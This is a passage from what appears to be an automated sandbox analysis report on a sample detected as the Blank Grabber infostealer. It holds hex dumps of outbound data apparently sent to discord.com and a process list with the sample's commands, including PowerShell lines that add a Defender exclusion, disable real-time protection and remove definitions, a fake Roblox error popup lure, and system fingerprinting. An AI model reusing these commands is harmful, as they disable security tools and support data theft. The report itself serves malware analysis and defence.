                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 83 8d 61 22 02 08 0f f6 08 5e 39 26 70 aa 39 45 c0 b1 8e bc 10 56 e7 85 0d 61 94 c2 1e 32 c0 59 e0 44 93 7d 34 d8 b1 f1 34 ab 06 1d 29 f0 28 7e e4 cc fb b0 06 0f 4c e9 87 99 1a 7c 6b 96 a1 59 18 03 eb 26 f2 9a 61 36 4a 46 c2 de 6e 00 85 a9 18 9c 7a a5 fa 4f 52 f3 84 e8 d6 29 63 05 26 b2 c3 c0 e8 c6 e7 ba ba c7 82 00 6b 7d cb 41 be 64 81 2c f7 eb 47 c0 3a 8e b2 1c c4 f6 66 a6 d9 e6 c8 a6 c6 98 82 1d ea 3e cc 6f 1f f2 6a 6f e2 e1 00 33 1b 5d fb 73 ed 7d b6 5d f2 4e c7 5a 7a ca 48 0a 3c e6 ee 31 59 2b dd 4e ab ca 28 13 71 5a 60 36 ff 2a 24 14 f2 58 9f 82 46 66 1c 56 23 c9 e2 be bb 23 2c 35 c0 48 f7 af a4 c2 d8 d5 b1 ae f2 1c 76 cb 2b f6 98 31 f7 aa 76 48 a1 3a f6 b6 c6 38 89 d1 b2 9d 3d a9 62 63 f4 35 fb e6 d1 c9 c3 99 67 62 0a ba c7 1e e9 6d 4c 7a ae 26 47
                                                                                                                                                                                                                                                                  Data Ascii: a"^9&p9EVa2YD}44)(~L|kY&a6JFnzOR)c&k}Ad,G:f>ojo3]s}]NZzH<1Y+N(qZ`6*$XFfV##,5Hv+1vH:8=bc5gbmLz&G
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: ca cb 6a 3b e9 14 24 a1 05 94 26 e6 a3 9f 83 28 75 6d 5f 50 7a e8 22 fc b7 a4 ea 5d 9b 6c fb 6e 7d bb 6a cb 0f 75 13 83 b5 5b f5 df 75 fb 90 47 00 3d c0 04 7f 39 c8 31 5e 45 70 12 e4 d5 a4 7b 0d 50 2d e3 64 d1 a0 fe 91 88 a8 e1 f6 5a 12 89 bf b4 7f db 24 4f 12 20 6c 0f f2 a3 31 1d 79 78 1f 07 2f ab 9a 0f 49 7f 24 c4 41 0e 98 ba 2f 90 4d 6c 9f 4d 28 1b d3 d4 ee c5 1d 9a d3 eb 9a aa fb 11 be a1 9c cb dc c0 ae 25 c2 6d 9b e0 34 83 c0 32 00 22 2c 0a 69 65 18 ca 83 93 7d a8 a0 6e 2f 96 16 41 f9 34 ba 10 67 8f 51 c2 ee 95 84 31 74 5d 82 7e 3a be 3c a3 81 07 fe 5c 4e 63 77 3a d0 fe 7d 11 1f 91 aa 29 99 b9 fe a0 c0 78 29 24 70 8b cc 71 d0 02 c0 bd 39 21 21 90 50 88 f4 9c 35 ad 78 43 45 21 f2 c5 23 96 f5 ae 4a ce 18 50 2a 1f 01 4f a1 73 60 c3 38 0b 1e 62 5f ba bc
                                                                                                                                                                                                                                                                  Data Ascii: j;$&(um_Pz"]ln}ju[uG=91^Ep{P-dZ$O l1yx/I$A/MlM(%m42",ie}n/A4gQ1t]~:<\Ncw:})x)$pq9!!P5xCE!#JP*Os`8b_
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 2d 3c 08 ae e3 08 dd 64 72 82 95 cd cb cd 48 a9 0f 38 c1 1a 48 3b 3d 85 85 d8 c1 8d 34 b7 a4 f6 5c 57 b5 57 a0 24 9b 96 b1 d5 d3 87 48 b7 95 18 20 b2 9d 1d 0c f2 6c d9 38 4a d5 15 e4 56 80 86 5b c9 93 fb de 9f 27 01 f6 70 70 1d 54 e1 2f d0 47 62 24 5c 7e 4c c6 85 13 ac ff 60 8d 7b a9 87 a1 e0 a8 21 91 d2 20 08 6b 1f f6 ad 49 47 6a 8e f0 ba a5 68 06 47 df b7 98 de 41 97 c0 83 1f eb c9 47 57 ef cb df 2e ed 9e 06 f0 0d 92 39 fa ba c6 9f 5e 4f 62 f4 c4 8a f4 3d f8 d4 cb 42 3f 9b 24 98 e6 02 1b 86 13 68 72 aa a0 4f a5 2a 03 e6 40 9a f8 50 4b e9 5f 9e 65 74 e6 92 00 a1 bd 6a 5d d5 4c e8 26 24 f2 12 c7 52 ca b8 5c b7 e3 b9 06 72 f1 ac 0a 73 a7 d8 b4 7e 0f e8 d2 1c f9 a3 0d d9 55 91 81 4b 5b f1 30 e4 6f 01 4e b9 da c2 4d 26 fe 0d fb 54 c0 d7 d5 c1 ec 25 45 2d 90
                                                                                                                                                                                                                                                                  Data Ascii: -<drH8H;=4\WW$H l8JV['ppT/Gb$\~L`{! kIGjhGAGW.9^Ob=B?$hrO*@PK_etj]L&$R\rs~UK[0oNM&T%E-
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 60 94 5d 9e 32 b2 aa e9 69 1d 39 94 67 37 d3 d9 6c 99 36 39 24 8e 99 31 93 0b 72 2f 48 66 1b c8 37 5e 9e a7 4a bf 77 8c e8 7e 86 8c 7b d0 83 ac 99 2d 46 02 33 c1 6f c2 88 ea e8 1e ce 0f 3e 76 2e b3 c2 b2 41 41 db 97 27 d8 03 4f 3e 73 ab d0 63 c3 8e cb 49 c7 4e 4c d8 98 a8 8a b4 ca 61 be 80 67 b8 72 cf a4 24 ea 35 9c 2c 4a 53 7e ab 59 52 13 32 d9 71 ea 5d 76 2a 96 42 6e 34 55 b4 99 ef 2f 65 4e b1 94 8f ba c0 80 74 35 0c 6f 27 44 16 50 bf 7b 67 23 e6 14 b5 d3 75 48 7a cc 46 68 ae ce 6e f7 ea 2a 62 b3 c4 a4 af 72 d0 24 cf a7 74 2c 5e 9a b7 9d 14 92 d8 d9 4e 39 5f 0f 95 42 52 9e e3 ea 59 4e 3b 92 b6 ac f2 27 ee 74 21 35 69 76 3e a3 70 cf 66 0b 07 9d d1 3f aa da 99 d8 64 51 d7 18 53 cc b6 a4 37 04 89 cf 40 19 60 a2 68 c7 40 d0 58 35 04 20 8b 7d 26 f2 3f f7 e6
                                                                                                                                                                                                                                                                  Data Ascii: `]2i9g7l69$1r/Hf7^Jw~{-F3o>v.AA'O>scINLagr$5,JS~YR2q]v*Bn4U/eNt5o'DP{g#uHzFhn*br$t,^N9_BRYN;'t!5iv>pf?dQS7@`h@X5 }&?
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: ba fc bf 96 0c da ac 2b 11 cd 4e e3 15 6b cc ea 23 26 2c 8f c2 bb 01 4a e1 13 0a 2e b3 24 48 bb e1 5d d2 d8 c1 77 60 8c 54 8a 7c 5c 01 50 1a 9a 26 a0 36 f9 99 84 4f 98 18 45 8d 87 97 7e 62 9e 00 0a 33 15 05 df 44 e0 05 bb 10 4b 78 c6 b5 e0 0d 1b 80 5e 96 54 44 d2 b3 70 68 4b fb ce 03 42 81 48 a8 85 f3 99 b0 30 7c e4 9f 83 2f 80 a9 a0 d2 b6 1e 3f 80 78 10 8d 5e a0 0a 34 f0 29 b7 b4 a2 e3 5a df 2b 59 fe 42 1e 86 d1 a5 16 65 c8 b7 d6 cd 0e cf 50 35 2c 5a e8 4a e2 ed 4f df 08 01 ec 5d ad 49 b6 fb 05 15 43 ec 86 4a 7d 57 70 31 08 36 65 4f c0 02 7a eb 6c 49 4e 52 9f 15 b3 35 1b 82 63 19 9d b4 ca bf af 88 c9 f7 84 c0 31 e5 84 83 a5 68 27 f5 0e bd 3d 4f 9d b6 09 f9 2d 86 ee 6c a7 b4 8d 81 91 06 19 dd 38 de c8 dc 68 ec 2e 56 5f 7d ce 78 89 49 a6 2f a7 0f 3f e2 92
                                                                                                                                                                                                                                                                  Data Ascii: +Nk#&,J.$H]w`T|\P&6OE~b3DKx^TDphKBH0|/?x^4)Z+YBeP5,ZJO]ICJ}Wp16eOzlINR5c1h'=O-l8h.V_}xI/?
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: d7 6a d7 a7 ca 10 be e5 17 71 4f c9 f5 0a 07 23 3f cb d2 e2 5c 87 97 a4 e6 71 32 17 d5 c5 67 83 95 66 eb f9 14 59 0f a9 de 6d 7f f8 b3 1b 08 d2 8e d9 c3 9e 62 3c 67 f6 f9 8f 96 0f 3d 72 fd 6b d7 49 fb ed 64 4c 64 1e f5 8f c6 c0 13 6d 81 c9 ee 2b 5c c2 df cd bb 3d 0b f5 76 80 cd 7a ae cc 87 57 57 93 30 b3 37 b8 59 34 d0 d8 24 59 bb fd 64 ed ed b1 25 d7 ad d1 af ff b3 03 15 23 95 0d aa 88 9a 0f 84 aa 8c 4e 98 7a eb 9b 76 76 4a da a4 a0 6e ba c5 75 35 59 4b 0a 58 27 11 7e 13 bb 13 56 d7 7d 86 28 75 d6 a9 ee 8d e6 5e 20 55 e1 9e 71 3d f5 da 88 43 33 98 11 39 58 68 07 ea 79 67 97 0d 2f 70 11 79 7b 50 6f 90 08 fd 02 6c db 67 0e 2a 91 7c 3e 5c 76 85 6b 5b c2 47 b5 08 92 61 fb 41 eb e2 a9 be bc 71 5e 38 68 78 89 80 75 81 b1 91 c6 61 a5 4a d0 3b 5e 08 48 da 7a 23
                                                                                                                                                                                                                                                                  Data Ascii: jqO#?\q2gfYmb<g=rkIdLdm+\=vzWW07Y4$Yd%#NzvvJnu5YKX'~V}(u^ Uq=C39Xhyg/py{Polg*|>\vk[GaAq^8hxuaJ;^Hz#
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 78 7b 33 81 96 05 43 37 2b 7b 6c f2 e9 fb 0c eb c8 ef 60 0f 4d a1 0c 06 47 08 d2 51 4f d4 47 31 3f 71 bc dd d3 12 eb a6 03 6a 01 bc 6f 84 98 b9 b5 f5 c7 5a a0 08 9e 08 a2 b8 27 fe b7 be e0 cf 8e 4d e7 ba d1 76 e8 39 aa f6 50 24 83 7f 5b 2d 35 d9 c2 c2 ee 47 c4 d9 00 ec 74 81 32 9f c1 5f bd 3c ee aa 97 cd ec da d1 de 0f 2f b3 a9 91 3b 15 0d f8 42 6a c7 ea ee f9 2c 49 f5 49 b3 0d 87 e9 0b 9c 1f 11 49 3f d6 3e ef 06 bd c3 57 98 0e ee ac 78 41 78 d2 d8 66 72 c3 36 0c ee 55 3f d3 27 49 a5 7d 2d a7 1f d1 d5 3f df d4 42 97 2e 0b 4d 12 90 5d ab cd 65 1d dc bd 2e 81 f5 03 35 5c 67 d1 00 4c 2f 19 47 0a 24 f1 b9 9a 7b ef 31 4c f2 40 a0 eb 40 0f 85 04 1b f7 94 c3 3d 74 62 59 cf cc 66 cd ff 8c 3f 4f 3e 74 63 83 40 0a ad 16 69 64 5e 03 a4 8b 87 d2 bb 83 d6 98 5e 3d b7
                                                                                                                                                                                                                                                                  Data Ascii: x{3C7+{l`MGQOG1?qjoZ'Mv9P$[-5Gt2_</;Bj,III?>WxAxfr6U?'I}-?B.M]e.5\gL/G${1L@@=tbYf?O>tc@id^^=
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 3a d0 b4 f0 79 f9 02 85 35 f3 a7 c9 9c 01 34 49 a4 bd 43 fe eb 54 29 c1 39 01 05 35 eb 5e cc 3c aa 0f e8 53 f2 e7 2a c0 a4 f2 75 0b 3b ff c4 24 75 46 35 46 67 12 52 7a f2 b2 17 f3 94 2e 9b 26 9f 2a 74 77 d7 8c dc a7 97 40 3e 79 1a b1 d4 d5 3a 5b d4 e9 d1 39 a6 99 c2 f0 0e 8c 13 bd 9f 08 e1 9e 28 d4 11 eb f9 a1 f0 e4 5e fc aa 54 4f 4a 7e 91 3e ac 0a b2 a3 e9 2d 62 b8 80 a3 a4 dc 3c 27 e5 08 06 ca 8d a4 0c 6f e4 f3 23 36 6f e0 3c 23 90 0b 6b f9 48 44 69 bb 6a 97 e8 8e b0 9b fd 31 58 53 4e d9 56 29 6e ec 87 9f 21 1d 09 a9 5a 1b e6 54 9d 3e e7 8a 7b 11 38 6d 5d 3d 22 ca 39 02 2f 02 7f c4 85 00 ac 6c f9 4d 80 eb 51 0a 6b 27 56 47 ba ca f5 19 e9 00 8e e6 f7 a4 45 46 54 3f 8d 6c cc 61 22 40 3b f0 0e bc a4 bd 83 9e 44 8c 56 31 b4 37 29 76 f6 fa c1 b7 7f c1 08 c6
                                                                                                                                                                                                                                                                  Data Ascii: :y54ICT)95^<S*u;$uF5FgRz.&*tw@>y:[9(^TOJ~>-b<'o#6o<#kHDij1XSNV)n!ZT>{8m]="9/lMQk'VGEFT?la"@;DV17)v
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 8f 77 53 cf 87 3b 4b d8 10 2a ae e0 04 b7 b8 4b 1f ba 19 8f 7a 46 ca bb bf 11 f2 e1 81 5b 3d 2c 08 5c 71 92 85 5d 81 74 0c fd d4 23 5e 59 87 4d 77 29 43 7e 02 4e 46 9f af 29 9e 96 c2 d4 52 40 33 fe 4a 6c e1 b5 86 b2 0a 37 42 2e 1d 92 4f b0 e5 ff e3 8f 13 03 87 d7 32 b9 2e 8f 07 d1 d8 04 d6 8c 8d e1 e3 6d cd 9f 24 6e 1e d2 76 5d 45 17 da 74 45 83 0d 64 71 6c cb f0 21 79 50 ee b2 5e f9 7b b0 d1 c2 a0 84 5c c9 18 d9 d9 d5 82 a8 88 0c 22 5c f9 b1 03 e9 f4 5e c7 d8 6a 06 b6 1b 2b 60 7e 9a da 20 1a 13 70 a6 64 94 52 71 70 b0 1d a4 37 57 3e 83 46 bd 18 2a 64 64 9b 84 63 d1 81 64 a9 fa 8c dc 49 49 8f 7a 7c bc 25 0d 2e be de 5a 03 a8 64 de d7 bb bd 66 1a f9 5b 5d 13 80 ae 4a 57 34 1c 09 8c fa 7d 98 5a de 3a d6 4b 14 7b 8e fd c9 d1 9a 16 5a cb 3e 58 90 f5 a7 14 e5
                                                                                                                                                                                                                                                                  Data Ascii: wS;K*KzF[=,\q]t#^YMw)C~NF)R@3Jl7B.O2.m$nv]EtEdql!yP^{\"\^j+`~ pdRqp7W>F*ddcdIIz|%.Zdf[]JW4}Z:K{Z>X
                                                                                                                                                                                                                                                                  2025-01-05 06:19:51 UTC1257INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                  Date: Sun, 05 Jan 2025 06:19:51 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                  Content-Length: 45
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                  x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                  x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                  x-ratelimit-reset: 1736057992
                                                                                                                                                                                                                                                                  x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                  via: 1.1 google
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hAXIq9XtArVKc%2Ffubs8AT0r1q2NMEWVkjfKCdI6jYKfc1azRAidxd4u3EbEtHoGK3aODxcAqyDIfPtP5tjiUcDJFBrKwLRcktghWLo%2B2qmX%2BB5kfWJsHE43k6je%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Set-Cookie: __cfruid=14735b5a48e24b09b557091335c501751a43c2b5-1736057991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                  Set-Cookie: _cfuvid=q.0E45z3pGSklbxiFMyXrHfDuxC.4JrCDgahg7Y.Fx0-1736057991326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8fd15bea497fef9d-EWR


                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                  Start time:01:19:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\X9g8L63QGs.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2660000
                                                                                                                                                                                                                                                                  File size:7'849'526 bytes
                                                                                                                                                                                                                                                                  MD5 hash:17E85E39754DB87356121C00E17D3096
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                  Start time:01:19:09
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\X9g8L63QGs.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2660000
                                                                                                                                                                                                                                                                  File size:7'849'526 bytes
                                                                                                                                                                                                                                                                  MD5 hash:17E85E39754DB87356121C00E17D3096
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
